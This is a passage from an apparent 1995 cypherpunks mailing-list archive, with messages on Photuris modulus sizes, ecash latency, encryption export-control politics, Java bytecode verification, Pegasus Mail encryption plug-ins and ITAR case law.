2048 bit optional modulus and may even be a 4096-bit option if I can
find one in reasonable time. There was going to be a 512-bit optional
modulus but the group has reacted so strongly to it that I'm willing to
withdraw it.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 10 Nov 1995 08:12:29 +0800
To: cypherpunks@toad.com
Subject: Adm. William Studeman speaks about the CIA (fwd)
Message-ID: <Pine.SOL.3.91.951108193642.24896C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 08 Nov 95 17:24:55 CST
Subject: Adm. William Studeman speaks about the CIA

 
 
SAN ANTONIO -- Admiral William Studeman, Deputy Director, CIA spoke
to the San Antonio World Affairs Council on Wednesday (8 Nov).  He
covered the organization of the Central Intelligence Agency;
foreign intelligence;  the future of intelligence;  and went on to
state:
 
     "While the press is reporting a reduced need for intel-
     ligence..  President Clinton has signed an Executive Order
     increasing the level of intelligence collection to a level
     4..   A level 4 for example are countries like Somalia,
     Haiti, and Yugoslavia..  so the collection needs are much
     greater than ever before."
 
     "This administration now also requires that intelligence be
     turned over to law enforcement agencies;  which was never
     done before."
 
     [...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Thu, 9 Nov 1995 12:13:09 +0800
To: ylo@cs.hut.fi
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511081833.TAA10801@soikko.cs.hut.fi>
Message-ID: <199511090347.TAA04403@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Including the provision for the 512 bit prime is *HARMFUL* and
>*DANGEROUS*.  Export control is not really an issue here, because if
>companies in the United States cannot provide secure networking,
>there are other companies in the world that can.

You've convinced me. I remove my proposal to include a recommended 512-bit
modulus. The smallest standard modulus will remain 1024-bits.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 Nov 1995 10:30:41 +0800
To: frank@funcom.no (Frank Andrew Stevenson)
Subject: Re: True Random (short c-source)
In-Reply-To: <Pine.SGI.3.91.951108165325.25592A-100000@odin>
Message-ID: <199511090111.UAA07637@homeport.org>
MIME-Version: 1.0
Content-Type: text


Frank Andrew Stevenson wrote:

| I have written a short random number generator which appears to produce
| reasonable random numbers even in DOS, at the heart of the code is the
| short function fGetRand, the amount of entropy derived from this

	What tests have you done on the output that causes you to say
the random numbers are 'reasonable'?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 10:42:30 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: ecash speed
In-Reply-To: <199511082345.PAA02628@jobe.shell.portal.com>
Message-ID: <199511090130.UAA13562@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> The point is that if the anonymity afforded by ecash is too costly in
> terms of time, then we may end up stuck with a non-anonymous system
> simply because that is the only one efficient enough to work.  It would
> be good to find out if that is a serious problem.

I suspect that as CPU speed exponentiates this will become less and
less of a problem. It doesn't especially worry me.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Thu, 9 Nov 1995 13:10:46 +0800
To: adam@lighthouse.homeport.org
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090418.XAA07907@homeport.org>
Message-ID: <199511090454.UAA04547@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>You might want to offer a number of strong moduli in the 1024-1500 bit
>range.  Having multiple strong moduli in the same size (speed) range

We already have a secondary 1024-bit modulus in the spec. The question is
whether the problem is better solved by allowing parties to use private
moduli rather than by filling up the spec with additional moduli. Remember
that the original reason for specifying a particular modulus as "required"
is to guarantee some minimum degree of interoperability, not to meet every
possible threat.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Nov 1995 10:17:22 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
In-Reply-To: <199511090130.UAA13562@jekyll.piermont.com>
Message-ID: <199511090508.VAA05884@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

>Hal writes:
>> The point is that if the anonymity afforded by ecash is too costly in
>> terms of time, then we may end up stuck with a non-anonymous system
>> simply because that is the only one efficient enough to work.  It would
>> be good to find out if that is a serious problem.

>I suspect that as CPU speed exponentiates this will become less and
>less of a problem. It doesn't especially worry me.

Consider, though, what happens in the current ecash system if it were
used to charge a penny per page.  You would click on a link in your web
browser to go to the new page.  It would set the GET request to the
remote server as usual.

The server would fire up a CGI script which will run the shop software.
That software will make a TCP stream connection back to your ecash wallet
software which is running on the system where your client is.  It sends a
request to get payed $.01.  Assuming the wallet is configured to
automatically approve such a payment, it will send a one penny coin to
the shop software along the opened link.  (This may also involve doing a
PK encryption on the coin as an anti-theft measure; this aspect of the
current ecash system is not documented AFAIK.)

The shop software then opens a TCP stream connection to the bank, and
forwards the coin there.  The bank receives it, and checks the public
key signature in the coin.  It then compares the coin against every other
coin which has ever been spent (within the validity period of the coin)
to make sure it is not being doubly spent.  If this all checks out it
sends back some authentication message to the original server.  The shop
software then delivers the new page to the client browser.

This all has to happen whenever you click on a link in your browser.
Even with fast CPU's I think the extra step of connecting to the bank,
having it check against all coins, and getting approval will be
considerable for each link traversal.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Nov 1995 11:14:09 +0800
To: cypherpunks@toad.com
Subject: Industry Group Rebuffs U.S. on Encryption
Message-ID: <199511090232.VAA00163@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, November 8, 1995. 


   Industry Group Rebuffs U.S. On Encryption

   By John Markoff


   The campaign by the Clinton Administration to create a
   standard for data encryption acceptable to industry, civil
   liberties and law enforcement groups broke down yesterday
   when a group including some of the nation's most powerful
   technology companies rejected a compromise proposal.

   The aim is to set a policy that meets the needs of
   electronic commerce as well as the concerns of the National
   Security Agency and other Federal offices that are opposed
   to the proliferation of data-coding software, feeling it
   will make it impossible for them to gather intelligence
   overseas.

   The Administration offered a compromise plan and had been
   seeking comment from the public. But the industry coalition
   said yesterday that it found the Government unwilling to
   compromise. Thus, the group of 37 companies said, it would
   formulate its own policy proposal to present to the White
   House and to Congress in the next six months.

   High-technology industries want a data-coding standard
   secure enough that both businesses and overseas customers
   could use it for sensitive financial and business
   correspondence. They seek a longer and more powerful
   encryption key than the Government is willing to grant, and
   object to Government demands that law enforcement agencies
   have "back-door" access to such transmissions that would
   allow them to intercept coded messages.

   The letter is signed by several of the country's leading
   computer, software and on-line companies, among them
   America Online, Apple Computer, AT&T, Eastman Kodak
   I.B.M.'s Lotus Development division, MCI Communications,
   Microsoft, Novell, Oracle Sybase and Tandem Computers.

   On Aug. 17, the Administration proposed a liberalization of
   export-control procedures for "key escrow" software
   products, or those providing law-enforcement access.

   "The current policy directive also does not address the
   need for immediate liberalization of current export
   restrictions," the letter said "Such liberalization is
   vital to enable U.S. companies to export state-of-the-art
   software products during the potentially lengthy process of
   developing and adopting a comprehensive national
   cryptography policy."

   [End]

----------

   The Washington Post, November 8, 1995


   Encryption Control Plan Sparks Industry Protest

      High-Tech Groups Say Proposals Unworkable

   By Elizabeth Corcoran


   High-technology companies and advocacy groups are writing
   to Vice President Gore and House Speaker Newt Gingrich to
   protest what they contend are unworkable federal proposals
   for controllng the export of data scrambling technology.

   The letters deepen an industry-government rift that began
   only days after federal officials unveiled an outline of
   what they hoped would be a palatable plan at an industry
   meeting in August.

   Two separate coalitions are criticizing the
   administration's draft proposal, which the government
   circulated on the Internet on Monday.

   Current export regulations prohibit companies froan sending
   overseas any encryption, or data-scrambling technology,
   that exceeds a certain degree of sophistication. The
   government argues that it needs to be able to peek at
   messages and files with proper court authorization -- to do
   its job of protecting U.S. citizens from terrorist groups
   and other malevolent organizations.

   In July, some French students demonstrated they could
   readily break the type of encryption technology that the
   U.S. government lets companies export. In August, the
   administration said it would let companies include more
   complex types of encryption, provided they pledged to
   entrust to an authorized agent a "spare key," or the means
   for unscrambling the information.

   Unlike early proposals in which the government said it
   would hold such keys, the administration is suggesting that
   companies and individuals would be able to select private
   keyholders, much the way people pick their banks.

   But after a brief honeymoon, industry and civil liberties
   groups began to find flaws with the details in the new
   proposals. This week's letters indicate that whatever
   fragile compromise the government had hoped it had found
   has grown even weaker.

   One coalition, pulled together by the Washington advocacy
   group Center for Democracy and Technology, includes about
   three dozen high-tech companies and associations. The group
   has promised to draft an alternative plan within six
   months.

   "There is a very serious message here: that national
   security can't be controlling the Internet," said Jerry
   Berman, executive director of the center. "There are other
   issues, global competitiveness and privacy, that need to be
   placed in the balance -- and the administration's policy
   doesn't do that."

   A second coalition of about 10 free-market and libertarian
   groups, led by another policy group, Americans for Tax
   Reform, plans to send their letter to Gingrich in the next
   day or two. The group contends the administration's
   encryption proposals are an encroachment on citizens' civil
   rights.

   The administration's proposals would not restrict tbe
   encryption technologies that people use within U.S.
   boundaries. But it would require that if they
   electronically send an encrypted message to parties outside
   the United States, a spare key must be stored with an
   authorized agency.

   "Even though we recognize [the administration] has worked
   hard on its proposals, it's not the right direction," said
   Rebecca Gould, director of policy at the Business Software
   Alliance, a trade association of software firms.

   "We've been in this [debate] since July 1994," she added,
   a long time for companies that churn out a new version of
   most products every 18 months. "That means lost sales for
   us and a loss of U.S. industry sales abroad."

   [End]

----------

Both slipped by gummed eyes, thx gnu.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 14 Nov 1995 08:04:22 +0800
To: cypherpunks@toad.com
Subject: REMINDER: PARTY! Nov. 18th, sponsored by Community ConneXion
Message-ID: <199511090615.WAA14726@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Subject: REMINDER: PARTY! Nov. 18th, sponsored by Community ConneXion

Here's a little reminder:
We're having a party in a little over a week. I hope you can make it.

	Community ConneXion: the Internet Privacy Provider is having a
party! We're partying to celebrate the spread of privacy on the net,
through the increased security of internet products, as well as the
growth of our services. (Many new services and new features on existing
services will likely be announced before the party. Stay tuned.)
	We're inviting all our customers and other potentially
interested parties, which includes you, if you've received this
note. So please join us, and send a copy of this invitation to anyone
else you may know who would be interested in attending.

Where: Icon Byte Bar & Grill
       299 9th Street (at Folsom)
       SF CA 94103
When:  Sat. Nov. 18 1995
       7:00 PM

	This is a good chance to meet and network with the people who
are making privacy on the internet a reality. Find out more about the
HackNetscape and HackMicrosoft contests. Learn about our specialized
web services, found nowhere else but at Community ConneXion. Hear
about the anonymous and psuedonymous servers here and what we're doing
to improve them.
	There will be catered snacks and a no-host bar.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 9 Nov 1995 14:54:27 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511082306.PAA24448@jobe.shell.portal.com>
Message-ID: <30A19E4E.348A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com wrote:
> Afterall, Netscape (and AT&T) have had, over THREE WEEKS to work on this
> problem or to make some form of public comment, and have done nothing, but
> put some of their programmers -- unofficially ... speaking for myself ...
> not speaking for the Company -- programmers on this list

  I was posting here before your supposed "flaw" was posted.  I have never
been told that I should or should not participate on this list by anyone
at netscape.

> Meanwhile people are having their PGP keyrings collected, their passwords
> monitorred, and all of the information -- even information which they have
> NOT posted to Usenet, information that is simply on their personal hard
> drives, or on a private corporate network that is behind a firewall --
> collected by anyone who actualy understands *how* to use Netscape
> Navigator's standard features to do it.

  Please show us some proof.  All you have done is post unfounded allegations
backed up by flawed logic and a misunderstanding of the technology.  Send me
a URL, and I will point my navigator at it.  If you can collect my PGP key ring
you can gloat here or anywhere else.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 9 Nov 1995 14:39:05 +0800
To: Raph Levien <loki@obscura.com>
Subject: Re: PGP Comment feature weakens remailer security
Message-ID: <199511090618.WAA21037@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:47 PM 11/8/95 -0800, Raph Levien wrote:
> So let me rephrase the question: what's the minimum number of entropy
> bits that can be used and still give you that warm and fuzzy feeling
> that you don't have to worry about the possibility that the message
> might be corrupted?

I guess that if comet hits the earth and exterminates the human race
you would not be unduly worried by a corrupted message, so let us make
the odds equal to human civilization being destroyed on the same day.

We get roughly one massive extinction every hundred million years, or 
so and a smaller blast that would demolish our technology every ten 
million years or

So the probability of an error was equal to the human race and most
major species being destroyed the same day, you would not be unduly 
worried.

Probability of human civilization and all large animals being wiped out
by comet impact tonight is 2.7E-11, so thirty five bits should be 
sufficient.

But, if you want to feel really comfortable, make it forty bits.

The probability of hitting a forty bit combination by chance is
equal to the probability that all large animals on earth will
be wiped out by comet impact in the next three quarters of an hour.

But you might have a million lines, and send a million messages,
each of a million lines.

So let us make the probability that one of those fails equal to
the chance that all large animals on earth get wiped out in the next
half hour.

Well in that case make it eighty bits.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 Nov 1995 12:32:28 +0800
To: karn@qualcomm.com (Phil Karn)
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <199511090418.XAA07907@homeport.org>
MIME-Version: 1.0
Content-Type: text


You might want to offer a number of strong moduli in the 1024-1500 bit
range.  Having multiple strong moduli in the same size (speed) range
reduces the value of going after a particular one.  We all know how
security software tends to stay deployed longer than it really should.

Adam

Phil Karn wrote:

| Thanks. That's pretty much what we are doing -- requiring a particular
| 1024-bit modulus but recommending several others as options. There's a
| 2048 bit optional modulus and may even be a 4096-bit option if I can
| find one in reasonable time. There was going to be a 512-bit optional
| modulus but the group has reacted so strongly to it that I'm willing to
| withdraw it.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 13 Nov 1995 18:57:34 +0800
To: "Dietrich J. Kappe" <goedel@tezcat.com>
Subject: Java's verifier (was Re: Java insecurity - long - argumentative - you are warned.)
In-Reply-To: <v01510103acc4ce7ca31a@[206.1.161.4]>
Message-ID: <Pine.SOL.3.91.951108225902.10149A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Dietrich J. Kappe wrote:
> 
> This "checking," as any comp-sci undergrad will tell you, amounts to solving
> the halting problem for the java interpreter. While this is possible for a
[...]
> If you can write a checker that works in a reasonable amount of time, I'll
> write a turing machine simulator that'll do something nasty if the input
> machine halts. Then we'll split the fame and fortune for solving the 5 state

Yeah, but when you graduate, they let you in to the real secret- if a 
problem is NPC or Undecideable, either use some wild guesswork (oops, 
heuristic), or try solving enough of the problem to be usable. 

The java verifier not only terminates, but runs in time linear to the 
size of the program to be verified. This is because the verifier doesn't 
really calculate whether a program is safe or not; it determines whether 
it can prove that the program is safe or not. It's possible to generate 
sequences of bytecodes that do not perform unsafe accesses, yet which are 
still rejected by the verifier because they violate it's requirements.

The verifier can be considered to be an abstract interpretation over the 
depth and type-state of the operand stack. If the state is known before 
an instruction, it is always known after that instruction, and if there 
is more than one way to arrive at an instruction, each control path must 
arrive at that instruction with the same typestate.

Examples (not real JavaVM, but similar)

	load-int  <int>	== push an int onto the stack.
			before: ...
			after : ...,int

	load-float <flt>== push a float onto the tack
			before: ...
			after: ...,float
		
	add-int		== pop two ints off the stack, push sum onto stack
			before: ...,int,int
			after:  ...,int

	blt <val><add>  == pop an int off the stack, compare to val, and 
			      jump to address add if int is less than val

			before:  ...,int
			after:	 ...

	jmp <add>	== jump to adddress add
			before: ...
			after: ...

VALID
	load-int  1	; stack = (int)
	load-int  1	; stack = (int), (int)
	add-int		; stack = (int)

INVALID
	load-int 1	; stack = (int)
	load-float 1.0	; stack = (int) (float)
	add-int		; error, stack != (int), (int)

VALID
	load-int 2	;stack = (int)
	blt 1, a  	;stack = null
	load-int 3	; stack = (int)
	jmp b		; stack = (int)
    a	load-int 1	; stack = (int);
    b 	load-int 4	; stack = (int) (int)
	add-int		; stack = (int)

INVALID
	load-int 2	;stack = (int)
	blt 1, a  	;stack = null
	load-float 3	; stack = (float)
	jmp b		; stack = (float)	
    a	load-int 1	; stack = (int);	
    b 	load-int 4	; stack = ERROR (float || int)
	add-int		; stack = (int) ERROR

This last example is invlaid, even though it's possible in this case to show 
dynamically that the program will always arrive at b with an int on the 
stack; there are still two control paths that arive at b, one with an 
int, the other with a float.

I hope this makes sense

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 9 Nov 1995 14:03:34 +0800
To: cypherpunks@toad.com
Subject: Virus-Blocker
Message-ID: <Pine.BSD.3.91.951109004245.1600C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
This item from 11 07 95 Edupage may be of interest to you: 
 
                      VIRUS-BLOCKER 
 
McAfee Associates has a new product called WebScan that 
identifies virus-tainted programs before they're downloaded 
and warns the user not to continue.  Security experts say 
WebScan is the first product that prevents viruses from in- 
fecting a computer to begin with, rather than attacking the 
problem after it's already occurred.  (Wall Street Journal 
6 Nov 95 B6) 
 
 
Cordially, 
 
Jim 
 
 
                         NOTE 
 
 
To subscribe to Edupage, send a message to: 
 
                 listproc@ educom.unc.edu 
 
In the body of the message type:
 
               subscribe edupage <your name> 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 14 Nov 1995 08:04:19 +0800
To: cypherpunks@toad.com
Subject: FBI Computer Chief
Message-ID: <Pine.BSD.3.91.951109004544.1600D-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
11 06 95 Computerworld 92 runs this "Briefs" item that 
may be of interest to you: 
 
              FBI names computer chief 
 
Federal Bureau of Investigation Director Louis J. Freeh 
last week announced the appointment of Carolyn G. Morris 
to head the FBI's Information Resource Division, which 
has 2,000 employees and a budget of $200 million. 
 
Morris will oversee all automation matters for the FBI 
and research and development for the new National Crime 
Information Center, a nationwide computerized system for 
law enforcement. 
 
 
Cordially, 
 
Jim 
 
 
 
 
                         NOTE 
 
 
     If you wish to subscribe to Computerworld, call 
 
                    1 800 669 1002 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 Nov 1995 05:50:02 +0800
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Photuris Primality verification needed
Message-ID: <199511090913.BAA08368@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:47 PM 11/8/95 -0800, you wrote:
>>Including the provision for the 512 bit prime is *HARMFUL* and
>>*DANGEROUS*.  Export control is not really an issue here, because if
>>companies in the United States cannot provide secure networking,
>>there are other companies in the world that can.
>
>You've convinced me. I remove my proposal to include a recommended 512-bit
>modulus. The smallest standard modulus will remain 1024-bits.

If speed is really a concern, you could do a 640 or 768 bit modulus
("Hey, back when we wrote that, everybody assumed 640 would be enough for
everybody!"), or alternatively, let people use 512-bit private modulus values -
they're still short, but they're not a target if everybody's got their own
(which also means that popular applications shouldn't ship with a
built-in 512-bit prime; if Windows 97 did that, it'd be about the same
as putting it in the spec, so really short primes should probably require
user-generation, which may contradict the desire to use short numbers
to save time.)

One question is how to conveniently let the standard offer negotiation for
the modulus length and value without adding a lot of handshake steps
        -> WILL MODLENGTH 512PRIV 768 1024 1024ALT 2048
        <- DO MODLENGTH 512PRIV
        -> WILL MODULUS
8758432798573409875098347509834750983745098348584395984357908347509843750984
3750983
        <- 404 HEY, THAT'S NOT A STRONG PRIME!



#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 Nov 1995 17:37:44 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: "Industry Group Rebuffs U.S. on Encryption" (NYT 8Nov95, C3)
Message-ID: <199511090914.BAA08379@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:50 PM 11/8/95 -0800, you wrote:
>A group of 37 companies and trade and privacy associations sent a
>letter to Al Gore yesterday, complaining about Clipper-II and crypto
>export controls, and promising to send their own policy proposals
>to Congress and the Administration within six months.

We talked about this at dinner - what kind of proposals can industry offer, 
other than "128 bits and honest escrow" or "64 bits and no escrow"?
"128 bits now, with no escrow if you want any campaign contributions this fall"
or simply "get stuffed, we're all buying our crypto from Europe and including
it in all our products" ?

According to one of the newspaper articles, the gang of 37 is a Jerry Berman/CDT
coordination, so I don't expect one of the more radical answers from them,
but maybe they'll do the right thing.  The fact that Netscape is including
secure email in their Navigator next release can be a big lever pushing the
Feds toward giving up, and perhaps deserves some publicity once the 
release version is out the door.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 9 Nov 1995 17:31:52 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
Message-ID: <199511090914.BAA08391@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>"Perry E. Metzger" <perry@piermont.com> writes:
>>I suspect that as CPU speed exponentiates this will become less and
>>less of a problem. It doesn't especially worry me.

CPU speed in desktop or notebook computers isn't much problem;
CPU speed in smartcards is still an issue, and it may be
one or two more rounds of exponentiation before we'll see cards
that are both fast enough and really secure.

At 09:08 PM 11/8/95 -0800, Hal <hfinney@shell.portal.com> wrote:
>Consider, though, what happens in the current ecash system if it were
>used to charge a penny per page.  You would click on a link in your web
>browser to go to the new page.  It would set the GET request to the
>remote server as usual.

For penny-a-page on-line services, unless ecash transaction costs are
_radically_
cheap, it probably makes more sense for the service to sell its own tokens,
bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
No calculation required, just an on-line lookup for double-spending
and you don't get your page if you double-spend.  An alternative to them
picking the token numbers is for you to give them the numbers and them
to keep them in their database, but that's probably unlikely to be done
and doesn't really buy you much privacy.

If that's not anonymous enough for you (because your IP address could be
traced when you buy the tokens, and coordinated with them later),
use a packet laundry, or connect from your dialup access provider, 
which will tell the newspaper you're port43.server29.netcom.com or
something equally uninformative; or dial in from the public library or cafe.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Armadillo Remailer <remailer@armadillo.com>
Date: Mon, 13 Nov 1995 18:57:31 +0800
To: cypherpunks@toad.com
Subject: Worth of Crypto Consulting
Message-ID: <199511090735.BAA01846@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

 I have been doing some crypto consulting to small businesses for a while,
but it looks like I may be swimming with bigger fish in the near future. I
was wondering what "real" crypto consultants are getting these days. I will
be advising these people on the security of systems others are developing,
and helping them develop their own software, but I have no idea what the
market value of my time is.

Reply to the list, or send a message encrypted to the key below to
alt.anonymous.messages with the subject "anonymous consultant". 

        Many thanks,
           Anonymous Consultant

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCSAzCg84IAAAEEAOQ8cz/jqonUOWmS9lMWMh1CnFqwV8mYTbBS2zla5UQ61Tdn
272AUeKSil0PkUKqRcFW4xFbOJsMACryo15/iciuRQkwQ27ypDL0gcyjEIeYt6Aa
h4j8b+XWWtjkRg5LApn6vms+ocI+MkFn6phJkOTb+xC18W572HFMiqhPvugNAC0Q
AAAAAAG0LUFub255bW91cyBDb25zdWx0YW50IDxhbHQuYW5vbnltb3VzLm1lc3Nh
Z2VzPg==
=pIE2
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Staedeli" <scottst@ionet.net>
Date: Thu, 9 Nov 1995 16:22:50 +0800
To: cypherpunks@toad.com
Subject: Pegasus Mail 2.20
Message-ID: <199511090804.CAA20494@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain


   The new beta release of Pegasus Mail (one of the better e-mail
apps available) has a new feature:


     --------------------------------------------------------------
    Runtime-loadable encryptor/decryptor modules for Pegasus Mail.

                         Pegasus Mail System, 
        Copyright (c) 1990-95, David Harris, All Rights Reserved
     --------------------------------------------------------------

The hot topic on everyone's lips is "privacy". And, as usual, the
computer industry is in the process of confusing and disrupting the issue
beyond recognition... We have factions all over the place each arguing
passionately for its own most beloved encryption scheme, and some of the
rhetoric is getting pretty heated.

Add to the proliferation of interests the USA's ridiculous export laws on
encryptors and the sum is trouble. As far as I can tell, encryption is
going through what seems to be an industry-standard cycle of chaos:
everyone suddenly realises there's a lack/opportunity/need and rushes to
promote the idea they like best; a small war develops during which the
users and peripheral developers are left bemused and bewildered amongst
the welter of extravagant claims and counter-claims, then eventually
(usually after two or three years of total pandemonium) the group with
the most clout (although not necessarily the best product) will win out
and become "the standard".

I've been through this rat race several times and have no desire whatever 
to go through it again; on the other hand, my USERS have very legitimate 
concerns about privacy. So what do I do? Easy - I pass the buck.

WinPMail v2.2 and later supports third-party, runtime loadable modules to
handle encryption and decryption of mail. A special mechanism has been
defined that allows Pegasus Mail to detect that a third party encryptor
has been used and to determine whether the matching decryptor is
available on the system. The built-in encryptor will remain available for
those sites who only need moderate levels of message security.  WinPMail
will define an open interface for third-party encryptors and it is then
up to other people to write the code. What I envisage actually happening
is people writing "shell interfaces" for WinPMail - i.e., modules that
take the calls I make and translate them into calls to other programs,
such as PGP or whatever, returning the result.

   Let the games begin.


--scottst@ionet.net------http://www.ionet.net/~scottst--
   >~<^xXx       | "The Internet is simply a means of 
        xX   #   | communication. Efforts to stop infor-
      (XXX) #    | mation by enjoining it are doomed to
    (XXXXXXX)    | failure in a free society."
DON'T TREAD ON ME|        -- Prof. Frank Tuerkheimer
========================================================
=========NSA trip phrase of the week: DEUTERIUM=========




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 9 Nov 1995 22:39:50 +0800
To: cypherpunks@toad.com
Subject: Re: Cybercensor in Singapore
Message-ID: <199511091425.GAA00125@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:15 PM 11/8/95 +0100, Anonymous wrote:
> The Government has blunted an uncensored
> Internet forum on Singapore political life by assembling
> a group of users who make sure the Government's views are
> represented.

That is censorship?

I visited the Singapore forum a few months ago --

When I visited Cuba (physically) everyone was visibly afraid.

When I visited the Singapore electronically, they were not
afraid.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 9 Nov 1995 23:44:42 +0800
To: cypherpunks@toad.com
Subject: Re: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <199511091528.HAA05703@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@osf.org> writes:

>I sure hope some tells David Harris that his program is now export
>controlled.  From my reading of his message, it seemed like he thinks he
>"beat the system" because he didn't include actual crypto code.

Even if he were in the US, I would hope that no one told him that.  One
of the elements of the offense of violating the arms export control act
is that the violation be willful.  The exporter has to violate a known
legal duty not to export the item.  One of the reasons for this is simply
that the ITAR list is long and technical and average individuals cannot be
expected to know all its details.  This is mentioned in the Lizarraga
case, at approximately 541 F2d 828:

"Two features of 22 USC 1934 strongly indicate that Congress used the
term 'willful' to require a showing of specific intent.  First, the
statute prohibits exportation of items listed by administrative
regulation, not by the statute itself.  Second, upon referring to the
pertinent regulation, 22 CFR part 121, we find that the regulation
contains an exhaustive list of items including amphibious vehicles,
pressure-breathing suits, aerial cameras, 'privacy devices,' and
concealment equipment (including paints).  Unlike those substances which
are known generally to be controlled by government regulation, such as
heroin or like drugs, these items might be exported or imported
innocently.  Under such circumstances, it appears likely that Congress
would have wanted to require a voluntary, intentional violation of a
known legal duty not to export such items before predicating criminal
liability."

So in this case I think widespread publicity about the ITARs can be
considered harmful.  All those helpful people going around warning others
